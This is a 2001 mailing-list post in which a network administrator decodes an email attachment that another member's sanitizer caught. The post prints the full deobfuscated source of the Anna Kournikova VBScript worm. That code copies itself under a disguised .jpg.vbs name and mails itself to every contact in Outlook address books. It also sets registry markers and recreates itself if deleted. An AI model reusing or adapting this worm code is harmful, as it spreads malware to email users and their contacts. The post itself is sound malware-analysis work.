[Esa-l] Alright, guys, what is this?

Phil Pennock pdp at nl.demon.net
Mon Feb 12 11:09:27 PST 2001 

Assuming mail.spconnect.com will let our hub talk to it this time,

On 2001-02-12 at 10:15 -0700, Brett Glass wrote:
> The pattern I've added to John's sanitizer to trap hidden 
> extension exploits just caught this. What is it?

Warning: I'm not a VB person; I do Unix, not Windows.  This is the final
results of my decoding.

Processing:
 * undo quoted-printable
 * change names in function definition, re-indent
 * implement function in perl, move main body over as string, print
   results of decoding
 * change names of various objects, re-indent, decode sequence of Chr()
   calls

It looks like it does pretty much what I've heard these viruses do.
Some "hide from kid-sister" encoding is all.

-----------------------------< cut here >-------------------------------
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set shell_object = CreateObject("WScript.Shell")
shell_object.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set fs_object= Createobject("scripting.filesystemobject")
fs_object.copyfile wscript.scriptfullname,fs_object.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"

if shell_object.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
 do_the_worm_bit()
end if

if month(now) =1 and day(now) =26 then
 shell_object.run "Http://www.dynabyte.nl",3,false
end if

Set txtfile= fs_object.opentextfile(wscript.scriptfullname, 1)
file_contents= txtfile.readall
txtfile.Close

Do
 If Not (fs_object.fileexists(wscript.scriptfullname)) Then
  Set script_file= fs_object.createtextfile(wscript.scriptfullname, True)
  script_file.writefile_contents
  script_file.Close
 End If
Loop

Function do_the_worm_bit()
 On Error Resume Next
 Set outlook_app = CreateObject("Outlook.Application")
 If outlook_app= "Outlook"Then
  Set mapi_space=outlook_app.GetNameSpace("MAPI")
  Set address_lists= mapi_space.AddressLists
  For Each addr_entry In address_lists
   If addr_entry.AddressEntries.Count <> 0 Then
    addr_entry_count = addr_entry.AddressEntries.Count
    For loop_address= 1 To addr_entry_count
     Set new_message = outlook_app.CreateItem(0)
     Set recipient = addr_entry.AddressEntries(loop_address)
     new_message.To = recipient.Address
     new_message.Subject = "Here you have, ;o)"
     new_message.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
     set attachments=new_message.Attachments
     attachments.Add fs_object.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
     new_message.DeleteAfterSubmit = True
     If new_message.To <> "" Then
      new_message.Send
      shell_object.regwrite "HKCU\software\OnTheFly\mailed", "1"
     End If
    Next
   End If
  Next
 end if
End Function
'Vbswg 1.50b
-----------------------------< cut here >-------------------------------

-- 
Phil Pennock                        <pdp at nl.demon.net> <Phil.Pennock at thus.net>
Demon Internet Nederland -- Network Operations Centre -- Systems Administrator
Libertes philosophica.
NL Sales: +31 20 422 20 00                          NL Support: 0800 33 6666 8

More information about the esd-l mailing list